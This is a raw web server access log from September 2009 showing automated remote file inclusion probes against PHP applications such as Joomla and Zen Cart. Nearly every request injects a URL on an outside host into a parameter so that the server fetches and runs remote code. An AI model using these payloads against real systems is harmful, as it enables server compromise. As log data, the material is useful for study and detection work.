65.38.188.164 - - [08/Sep/2009:02:00:17 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
65.38.188.164 - - [08/Sep/2009:02:00:17 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.38.188.164 - - [08/Sep/2009:02:00:17 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:00:20 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:00:20 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:00:21 -0500] "GET /logs/access_log.1236211200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.38.188.164 - - [08/Sep/2009:02:00:24 -0500] "GET /logs/access_log.1238112000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:00:46 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:00:47 -0500] "GET /logs/access_log.1236211200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.234 - - [08/Sep/2009:02:01:02 -0500] "GET /logs/access_log.1195948800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.233.69.41 - - [08/Sep/2009:02:02:09 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:02:02:09 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:02:02:09 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:02:02:51 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:02:02:52 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:02:02:52 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
82.151.132.176 - - [08/Sep/2009:02:03:59 -0500] "GET /logs//login.php?_SESSION[docroot_path]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
82.151.132.176 - - [08/Sep/2009:02:03:59 -0500] "GET /logs/access_log.1240012800//login.php?_SESSION[docroot_path]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.151.132.176 - - [08/Sep/2009:02:03:59 -0500] "GET //login.php?_SESSION[docroot_path]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:02:04:09 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:02:04:09 -0500] "GET /logs/access_log.1238112000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:02:04:09 -0500] "GET /logs/access_log.1240444800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.55.106.181 - - [08/Sep/2009:02:04:33 -0500] "GET /logs/access_log.1116460800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
58.184.252.3 - - [08/Sep/2009:02:04:34 -0500] "GET /logs/access_log.1236211200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:04:35 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:04:38 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
58.184.252.3 - - [08/Sep/2009:02:04:49 -0500] "GET /logs/access_log.1230768000//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.151.132.176 - - [08/Sep/2009:02:05:05 -0500] "GET /logs/access_log.1241654400//login.php?_SESSION[docroot_path]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:06:00 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:06:01 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:06:01 -0500] "GET /logs/access_log.1236211200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
190.144.44.36 - - [08/Sep/2009:02:06:30 -0500] "GET /logs/access_log.1236211200//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:07:00 -0500] "GET /logs/access_log.1246233600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:07:26 -0500] "GET /logs/access_log.1242691200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:07:27 -0500] "GET /logs/access_log.1244505600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:07:27 -0500] "GET /logs/access_log.1244937600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:07:27 -0500] "GET /logs/access_log.1248048000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:07:54 -0500] "GET /logs/access_log.1246752000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:07:54 -0500] "GET /logs/access_log.1243641600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:07:54 -0500] "GET /logs/access_log.1244419200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:07:54 -0500] "GET /logs/access_log.1244678400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:02:07:55 -0500] "GET /logs/access_log.1236211200//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:02:07:59 -0500] "GET /logs/access_log.1236211200//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:19 -0500] "GET /logs/access_log.1243296000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:19 -0500] "GET /logs/access_log.1243900800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:20 -0500] "GET /logs/access_log.1242086400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:20 -0500] "GET /logs/access_log.1246579200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:20 -0500] "GET /logs/access_log.1243555200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:20 -0500] "GET /logs/access_log.1244073600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:20 -0500] "GET /logs/access_log.1241913600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:20 -0500] "GET /logs/access_log.1243382400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:08:31 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:08:31 -0500] "GET /logs/access_log.1236211200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:08:35 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:08:43 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:08:43 -0500] "GET /logs/access_log.1244764800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:08:43 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:43 -0500] "GET /logs/access_log.1242518400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:43 -0500] "GET /logs/access_log.1242172800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:44 -0500] "GET /logs/access_log.1247443200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:44 -0500] "GET /logs/access_log.1247875200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:44 -0500] "GET /logs/access_log.1243123200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:44 -0500] "GET /logs/access_log.1245196800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:44 -0500] "GET /logs/access_log.1243209600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:08:47 -0500] "GET /logs/access_log.1243814400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:08:49 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:08:54 -0500] "GET /logs/access_log.1237593600///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:08:57 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:08:57 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:08:57 -0500] "GET /logs/access_log.1244764800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:09:05 -0500] "GET /logs/access_log.1230768000//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:09:09 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
61.100.180.14 - - [08/Sep/2009:02:09:16 -0500] "GET /logs/access_log.1247961600///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:09:49 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:09:50 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:09:50 -0500] "GET /logs/access_log.1244764800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:10:16 -0500] "GET /logs/access_log.1237593600///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:10:16 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:10:17 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 200 204203 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:10:18 -0500] "GET /logs/access_log.1246233600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:10:23 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:10:23 -0500] "GET /logs/access_log.1237593600///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:10:27 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 200 204203 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:10:39 -0500] "GET /logs/access_log.1247961600///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
208.64.216.6 - - [08/Sep/2009:02:10:46 -0500] "GET /logs/access_log.1247961600///?_SERVER[DOCUMENT_ROOT]=http://happy-winners.de//contenido/includes/heva/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:10:55 -0500] "GET /logs/access_log.1242691200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:10:55 -0500] "GET /logs/access_log.1244505600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:10:55 -0500] "GET /logs/access_log.1244937600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:14 -0500] "GET /logs/access_log.1246233600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:14 -0500] "GET /logs/access_log.1242691200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:17 -0500] "GET /logs/access_log.1248048000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:18 -0500] "GET /logs/access_log.1244678400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:18 -0500] "GET /logs/access_log.1246752000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:18 -0500] "GET /logs/access_log.1243641600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:18 -0500] "GET /logs/access_log.1244419200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:33 -0500] "GET /logs/access_log.1244937600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:33 -0500] "GET /logs/access_log.1244505600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:33 -0500] "GET /logs/access_log.1248048000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:33 -0500] "GET /logs/access_log.1244678400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:33 -0500] "GET /logs/access_log.1243641600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:33 -0500] "GET /logs/access_log.1246752000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:33 -0500] "GET /logs/access_log.1244419200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:38 -0500] "GET /logs/access_log.1241913600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:38 -0500] "GET /logs/access_log.1243900800//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [08/Sep/2009:02:11:38 -0500] "GET /logs/access_log.1243296000//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:02:11:39 -0500] "GET /logs/access_log.1236211200//classes/adodbt/sql.php?classes_dir=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:02:11:39 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
85.214.91.139 - - [08/Sep/2009:02:11:39 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.115.89.97 - - [08/Sep/2009:02:11:42 -0500] "GET /logs/access_log.1246233600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
